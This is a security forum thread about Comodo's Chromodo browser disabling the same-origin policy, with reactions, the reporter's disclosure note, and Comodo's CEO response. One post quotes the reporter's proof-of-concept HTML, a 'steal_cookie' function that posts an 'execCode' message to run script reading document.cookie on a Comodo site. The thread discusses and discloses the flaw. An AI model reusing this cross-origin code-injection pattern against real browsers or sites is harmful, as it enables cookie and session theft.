Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security

Status
Not open for further replies.

Azure

Level 28
Verified
Top Poster
Content Creator
Oct 23, 2014
1,712
Not the first time Comodo has been in the controversial spotlight regarding weakening a user's web security. Remember privdog?
Personally I think Comodo should focus in strengthening their firewall software instead of wasting time on browsers that they might eventually abandon(not update them in a long time or stop development on them entirely)

I would like to know what our Comodo experts think of the situation. But I can imagine some of them saying something like "Meh. Nothing new. It's just Comodo being Comodo."
 
D

Deleted member 178

I would like to know what our Comodo experts think of the situation. But I can imagine some of them saying something like "Meh. Nothing new. It's just Comodo being Comodo."

Exactly :D

More seriously, Comodo try to get attention , but poorly failed at this; CIS goes down at each new versions; keeping the same bugs/flaws across versions (and adding new ones) just to not hear "we told you so" :rolleyes:

I was a big fan until v5 , then Comodo decided to listen fanboys by adding more and more features not especially needed. sometimes i try a new release but get more and more disappointed every time...
 

woomera

Level 7
Verified
Jan 15, 2012
594
When you install Comodo Internet Security, by default a new browser called Chromodo is installed and set as the default browser. Additionally, all shortcuts are replaced with Chromodo links and all settings, cookies, etc are imported from Chrome. They also hijack DNS settings, among other shady practices.

Chromodo Internet Browser

Chromodo is described as "highest levels of speed, security and privacy", but actually disables all web security. Let me repeat that, they ***disable the same origin policy***.... ?!?..

To reproduce, do something like this:


<html>
<head></head>
<body>
<script>
function steal_cookie(obj)
{
// Wait for the page to load
setTimeout(function() {
obj.postMessage(JSON.stringify({
command: "execCode",
code: "alert(document.cookie)",
}), "*");
}, 2000);
}
</script>
<a href="javascript:steal_cookie(window.open('https://ssl.comodo.com/'))">Click Here</a>
</body>
</html>


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Comodo Internet Security Installs New Browser by Force, Disables All Web Security

Issue 704 - google-security-research - Comodo: Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security. - Google Security Research - Google Project Hosting
 
D

Deleted Member 333v73x

Pathetic, if you just wand Comodo Internet Security or Comodo Firewall, you actually get:

Comodo Internet Security or Comodo Firewall
Comodo DNS
Chromodo
GeekBuddy
If a threat is detected GeekBuddy pops up!!!!
 

Enju

Level 9
Verified
Well-known
Jul 16, 2014
443
It looks like Comodo pushed a change that removes the "execCode" API that I was using in my exploit.

This is obviously an incorrect fix, and a trivial change makes the vulnerability still exploitable. After "discussion" with Comodo (I can't really get any response from them, but I'm trying), I'll consider this bug fixed and file a new bug with the trivial bypass of their fix as a new issue.
Aka "security through stupidity"! I'm eagerly anticipating the results for CIS, if this Chromodo disaster is a sign of things to come it will be a fallout for them. :D
 

DracusNarcrym

Level 20
Verified
Top Poster
Well-known
Oct 16, 2015
970
While I agree with every accusation about COMODO's Chromium browsers and that COMODO should focus on the development of their main line of products (CIS/CFW, etc), I must say that, as far as I know, the installation of Chromodo/GeekBuddy/COMODO SecureDNS is NOT forced during the main product installation (e.g. CIS).
The user only needs to choose the custom installation option in the installer and uncheck the option to install any unneeded products/services. (like you would with any application, actually)
I have installed CIS/CFW in countless machines (physical and virtual) and not once was Chromodo installed, as I had chosen not to install it during installation.

If a threat is detected GeekBuddy pops up!!!!
Indeed, that is a rather annoying nagscreen which you can turn off only after CAV has made its first detection. (it would seem that there is no option to directly disable it in COMODO's settings, rather only through the nagscreen)
Moreover, it is not related to whether GeekBuddy is installed or not - even if GeekBuddy is not installed, the nagscreen will still popup on first malware detection (even if it's an obvious false positive).
I recommend CIS users download Eicar or something so that CAV detects it and produces the nagscreen, thus allowing users to turn it off.
 
Last edited:

Kate_L

in memoriam
Verified
Top Poster
Well-known
Jun 21, 2014
1,044
I've lost hope for Comodo, It was my favorite product since V2. Now, I don't trust them anymore and I don't like the "shady behavior". I will change it in 1-2 weeks (I need to finish some testing to see what will replace CIS). The sad part is that not only Comodo has some "shady behavior", there are more :(
 

jamescv7

Level 85
Verified
Honorary Member
Mar 15, 2011
13,070
Comodo is indeed reputable to their products which efficient and provide strong protection however their problem relies on how to prevent bugs or create stronger mechanism to avoid numerous loophole.

They tend not to prioritize but instead to conduct a new version where late response to fix bugs.

In the case of Chromodo, either its not been detect by those developers or likely not clearly inform; but if the scenario goes same like on their other products hence no surprise in their reputation.
 

vivid

Level 5
Verified
Dec 8, 2014
206
"Comodo "Chromodo" Browser disables same origin policy [...]" - News / Announcements / Feedback - CD

CEO's response:

A js code introduced by a non comodo code has caused this issue.
we have removed it and will do a release shortly.
we regret that Google did not follow its own responsible disclosure guideline and put users at risks by releasing this publicly, against their policy of 90 days.

We always care for our users and users come first.

We welcome the extra attention from google since we launched Which Ad Blocker world's most comprehensive adblocking initiative that includes an Android ad blocker (http://www.amazon.com/COMODO-Security-Solution-Ad-Blocker/dp/B01ATW7NC6 )

We invite google, in the interest of user's security, to follow its own published guidelines for responsible disclosure.


******************************
here is the note about Google responsible disclosure guideline, at the foot of the initial bug report, posted 21st Jan...of course its not been 90 days since 21st Jan.

Issue 704 - google-security-research - Comodo: Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security. - Google Security Research - Google Project Hosting

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
 
  • Like
Reactions: Der.Reisende
D

Deleted Member 333v73x

I've lost hope for Comodo, It was my favorite product since V2. Now, I don't trust them anymore and I don't like the "shady behavior". I will change it in 1-2 weeks (I need to finish some testing to see what will replace CIS). The sad part is that not only Comodo has some "shady behavior", there are more :(
Sorry for off-topic - best choices: Avira, Avast, AVG, Qihoo 360 Total Security, F-Secure, ESET, Norton...
 
  • Like
Reactions: JakeXPMan

Enju

Level 9
Verified
Well-known
Jul 16, 2014
443
we regret that Google did not follow its own responsible disclosure guideline and put users at risks by releasing this publicly, against their policy of 90 days.
They apparently love lying...
It looks like Comodo pushed a change that removes the "execCode" API that I was using in my exploit.

This is obviously an incorrect fix, and a trivial change makes the vulnerability still exploitable. After "discussion" with Comodo (I can't really get any response from them, but I'm trying), I'll consider this bug fixed and file a new bug with the trivial bypass of their fix as a new issue. Issue 704 - google-security-research - Comodo: Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security. - Google Security Research - Google Project Hosting
A js code introduced by a non comodo code has caused this issue. we have removed it and will do a release shortly.
What does that even mean? It's their own project and their "own" codebase, if it wasn't their own code it wouldn't be in the software and since no other Chromium based browser was affected by this I assume they are lying through their teeth. :rolleyes:
 
  • Like
Reactions: Rishi

vivid

Level 5
Verified
Dec 8, 2014
206
Let's not be too harsh on any vendor and judge in a correct manner from users perspective. It is obvious that they should have waited. Why?
(1) The reporter realized that it is not a proper fix.
(2) It is clear that Comodo did not mark it as fixed.
The reported issue (generally) may refer to multiple steps of replication and/or multiple issues. You cannot assume it is fixed if your test fails. It translates in more testing to properly fix the issue (emphasized : one issue).

That is just my understanding.
 
  • Like
Reactions: Rishi
Status
Not open for further replies.

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top